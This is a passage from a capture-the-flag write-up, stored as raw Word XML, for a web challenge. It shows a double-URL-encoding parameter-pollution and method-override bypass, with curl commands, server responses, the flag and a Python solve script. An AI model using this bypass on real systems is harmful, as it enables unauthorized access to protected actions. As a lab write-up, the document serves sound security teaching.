          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%3D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Double URL encoding of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%253D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (since </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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Let our raw request body be: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recipient=guest&amp;recipient%253Dadmin&amp;amount=100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#### First Pass (Gateway Guardian):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once = unquote(raw)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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recipient%253Dadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> decodes to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient%3Dadmin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Resulting string: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=guest&amp;recipient%3Dadmin&amp;amount=100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first = parse_qs(once)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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Parameter 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>['guest']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Parameter 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient%3Dadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>['']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (treated as a standalone key with no value, because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%3D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is literal and not an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> delimiter!)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Parameter 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>amount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>['100']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Check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient_seen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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first.get('recipient')[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> evaluates to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'guest'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Check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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With header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override: PATCH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, Guardian 2 passes with flying colors!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#### Second Pass (Legacy Application):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twice = unquote(once)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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recipient%3Dadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> decodes to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>!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Resulting string: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=guest&amp;recipient=admin&amp;amount=100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final = parse_qs(twice)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%3D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> has now morphed into a genuine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> key-value delimiter!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Parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>['guest', 'admin']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Parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>amount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>['100']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Parameter precedence check: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final_recipients[-1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> selects the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>last</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> element: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>!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amount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> evaluates to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'100'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe U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>Verification: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BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>final_recipient == 'admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>amount == '100'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>!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color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The server sets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>session['awakened'] = True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and issues a redirect to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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4 — Execution &amp; Verification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We can execute the exploit cleanly with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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# 1. Send the crafted PATCH override request with cookie jar preservation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curl -i -c cookies.txt -X POST https://byteme-soul-split.onrender.com/soul/transfer \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-H "X-HTTP-Method-Override: PATCH" \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-H "Content-Type: application/x-www-form-urlencoded" \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-d "recipient=guest&amp;recipient%253Dadmin&amp;amount=100"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HTTP Response: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 xml:space="preserve">HTTP/2 302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location: /soul/fragment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set-cookie: session=eyJhd2FrZW5lZCI6dHJ1ZSwiZ3VhcmRpYW4iOiJ0aGlyZCJ9...; HttpOnly; Path=/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content-type: text/html; charset=utf-8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The server accepted the transfer and set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>session['awakened'] = True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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# 2. Access the protected fragment route using the received session cookie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curl -i -b cookies.txt https://byteme-soul-split.onrender.com/soul/fragment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F2937"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Response Body: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&lt;!doctype html&gt;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&lt;html lang="en"&gt;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&lt;head&gt;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&lt;meta charset="utf-8"&gt;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&lt;title&gt;The Third Guardian Awakened&lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;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&lt;h1&gt;Guardian Awakened&lt;/h1&gt;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&lt;p class="flag"&gt;OWASP{s0ul_spl1t_th3_th1rd_guardian}&lt;/p&gt;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&lt;/body&gt;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&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="8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l_split_frag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Segoe UI" w:hAnsi="Segoe UI"/>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 5: Third Guardian Awakened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Step 5 — Automated Exploit Script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For reproducible automated exploitation, we provide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>solve_split.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/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12" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="12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Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>import requests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BASE_URL = "https://byteme-soul-split.onrender.com"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# Local: BASE_URL = "http://127.0.0.1:5000"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def solve():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session = requests.Session()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headers = {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"X-HTTP-Method-Override": "PATCH",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"Content-Type": "application/x-www-form-urlencoded"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}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payload = "recipient=guest&amp;recipient%253Dadmin&amp;amount=100"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Dispatching split-parser payload to {BASE_URL}/soul/transfer...")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res = session.post(f"{BASE_URL}/soul/transfer", data=payload, headers=headers, allow_redirects=False)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Response Status: {res.status_code}")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print(f"[*] Redirect Location: {res.headers.get('Location')}")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if res.status_code == 302 and res.headers.get("Location") == "/soul/fragment":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print("[+] Session awakened! Fetching flag from /soul/fragment...")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frag_res = session.get(f"{BASE_URL}/soul/fragment")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if "OWASP{" in frag_res.text or "FLAG{" in frag_res.text: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print("[🏆] Flag retrieved successfully!")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for line in frag_res.text.splitlines():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if "{" in line and "}" in line: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print(f"    {line.strip()}")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return True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else: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print("[-] Exploit rejected.")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    return False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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="2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 xml:space="preserve">    solve()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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Solution Summary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Parameter | Value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|---|---|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Target Endpoint | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /soul/transfer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Method Override Header | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override: PATCH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Injected Payload | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=guest&amp;recipient%253Dadmin&amp;amount=100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Gateway View | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=guest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recipient%3Dadmin=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Backend View | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=guest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recipient=admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>amount=100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Flag | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP{s0ul_spl1t_th3_th1rd_guardian}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Root Cause &amp; Vulnerability Explanation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Inconsistent Request Normalization:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each hop or abstraction layer in a web application pipeline must share the exact same canonicalization logic. In this challenge, the Gateway decoded once while the application layer decoded twice. This discrepancy allowed percent-encoded delimiters to pass uninspected through security controls before being interpreted by backend logic.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HTTP Parameter Pollution (HPP):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> When multiple values for the same parameter key are supplied, different frameworks handle them inconsistently (e.g., PHP takes the last value, ASP.NET concatenates with a comma, Python's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>parse_qs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns a list). The legacy application taking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipients[-1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly enabled parameter precedence hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber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Improper Method Overriding:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusting client-supplied method override headers like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> without enforcing strict route-level access control allows attackers to reach unvalidated legacy code paths.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Tools Used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cURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Crafting precise raw HTTP requests with custom headers and cookie management.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Python Requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Automated verification script.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20"/>
        </w:rPr>
        <w:t>Burp Suite Repeater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Interactive header manipulation and encoding experimentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>Timeline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Step | Action | Result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|---|---|---|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1 | Reconnaissance of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Discovered locked flag endpoint and transfer rejection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2 | Code analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transfer()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Identified 3-tier validation (Gateway, Validator, Legacy App)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3 | Parser differential identification | Noticed double URL decoding and first vs. last parameter selection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 xml:space="preserve">| 4 | Exploit construction | Encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
